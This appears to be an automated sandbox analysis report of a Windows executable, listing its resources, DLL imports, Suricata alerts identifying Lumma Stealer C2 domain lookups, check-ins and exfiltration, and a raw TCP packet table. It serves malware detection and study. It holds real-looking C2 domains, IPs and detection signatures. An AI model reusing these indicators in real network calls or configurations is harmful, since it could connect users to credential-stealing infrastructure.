                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2abc0x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2ad00x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2ae40x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2af80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2b0c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2b200x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2b340x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2b480x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2b5c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2b700x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2b840x30dataEnglishUnited States0.9166666666666666
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2bb40x14dataEnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2bc80x14dataEnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2bdc0x14dataEnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2bf00x14dataEnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2c040x14dataEnglishUnited States1.25
                                                                                                                                                                                                                          RT_GROUP_ICON0x1b2c180x5adataEnglishUnited States0.6555555555555556
                                                                                                                                                                                                                          RT_VERSION0x1b2c740x238dataEnglishUnited States0.5440140845070423
                                                                                                                                                                                                                          RT_MANIFEST0x1b2eac0x245XML 1.0 document, ASCII text, with CRLF line terminators0.5249569707401033
                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                                                                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                                                          advapi32.dllRegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegFlushKey, RegEnumKeyExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey
                                                                                                                                                                                                                          kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TerminateProcess, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReleaseMutex, ReadFile, OpenProcess, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCommandLineA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreateMutexA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle
                                                                                                                                                                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                                                          gdi32.dllUpdateColors, UnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, PtInRegion, Polyline, Polygon, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetTextExtentExPointA, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectType, GetObjectA, GetNearestColor, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBkMode, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutA, ExtSelectClipRgn, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePatternBrush, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateEllipticRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseEnhMetaFile, BitBlt
                                                                                                                                                                                                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, WaitForInputIdle, VkKeyScanA, ValidateRect, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendNotifyMessageA, SendMessageTimeoutA, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxW, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsClipboardFormatAvailable, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenuDefaultItem, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCaretPos, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DragDetect, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPointEx, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                                                          kernel32.dllSleep
                                                                                                                                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                                                          ole32.dllCreateStreamOnHGlobal, IsAccelerator, ReleaseStgMedium, OleDraw, OleSetMenuDescriptor, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                                                                                          oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, GetActiveObject, SysFreeString
                                                                                                                                                                                                                          olepro32.dllOleLoadPicture
                                                                                                                                                                                                                          comctl32.dllImageList_Duplicate, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                                                                          shell32.dllShell_NotifyIconA, ShellExecuteExA, ShellExecuteA, SHGetFileInfoA, SHFileOperationA, DragQueryPoint, DragQueryFileA
                                                                                                                                                                                                                          wininet.dllInternetSetOptionA, InternetReadFile, InternetOpenA, InternetErrorDlg, InternetCrackUrlA, InternetConnectA, InternetCloseHandle, HttpSendRequestA, HttpQueryInfoA, HttpOpenRequestA
                                                                                                                                                                                                                          URLMON.DLLCoInternetCombineUrl
                                                                                                                                                                                                                          shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHBrowseForFolderA
                                                                                                                                                                                                                          comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                                                                                                                                                                                                                          winmm.dllPlaySoundA
                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                          RussianRussia
                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                          2025-01-10T11:59:13.442100+01002058612ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ingreem-eilish .biz)1192.168.2.5565481.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.456229+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.5578991.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.469485+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.5625901.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.481736+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.5536301.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.500882+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.5502141.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.513175+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.5612871.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.537250+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.5528141.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.548954+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.5589151.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:13.581219+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.5522811.1.1.153UDP
                                                                                                                                                                                                                          2025-01-10T11:59:14.264393+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549773104.102.49.254443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:14.766792+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549773104.102.49.254443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:15.392088+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549783104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:15.822982+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549783104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:15.822982+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549783104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:16.390068+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549791104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:16.846895+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549791104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:16.846895+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549791104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:17.577909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549801104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:18.100326+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549801104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:18.757926+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549807104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:20.346697+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549819104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:21.716762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549829104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:23.238401+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549840104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:24.286958+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549847104.21.112.1443TCP
                                                                                                                                                                                                                          2025-01-10T11:59:24.807042+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549847104.21.112.1443TCP
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.608906031 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.608941078 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.609029055 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.610285997 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:13.610315084 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.264271021 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.264393091 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.266005039 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.266015053 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.266273975 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.315933943 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.359338045 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.766803026 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.766833067 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.766874075 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.766896009 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.766927004 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.766969919 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.767000914 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.767039061 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.767080069 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.864027023 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.864053011 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.864211082 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.864242077 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.867250919 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.869193077 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.869324923 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.873831034 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.873936892 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.874039888 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.881823063 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.881843090 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.881856918 CET49773443192.168.2.5104.102.49.254
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.881864071 CET44349773104.102.49.254192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.911519051 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.911567926 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.911657095 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.911933899 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:14.911947966 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.391973019 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.392087936 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.393769979 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.393775940 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.394074917 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.395363092 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.395380974 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.395422935 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.822985888 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.823082924 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.823267937 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.823782921 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.823796034 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.823812962 CET49783443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.823817968 CET44349783104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.933995962 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.934027910 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.934118986 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.934429884 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:15.934442043 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.389986992 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.390068054 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.393112898 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.393122911 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.393330097 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.394785881 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.394813061 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.394840002 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.846941948 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847034931 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847068071 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847100973 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847101927 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847121954 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847138882 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847198963 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847243071 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847273111 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847285032 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847295046 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.847318888 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.851566076 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.851596117 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.851624012 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.851624012 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.851634979 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.851665974 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.898804903 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933521032 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933648109 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933716059 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933816910 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933835030 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933845043 CET49791443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:16.933851004 CET44349791104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.100723028 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.100734949 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.100815058 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.101193905 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.101207018 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.577766895 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.577908993 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.579106092 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.579113960 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.579349041 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.580518007 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.580677986 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:17.580708027 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.100332022 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.100456953 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.100605965 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.100795984 CET49801443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.100816965 CET44349801104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.276402950 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.276446104 CET44349807104.21.112.1192.168.2.5
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.276509047 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.277415991 CET49807443192.168.2.5104.21.112.1
                                                                                                                                                                                                                          Jan 10, 2025 11:59:18.277426004 CET44349807104.21.112.1192.168.2.5
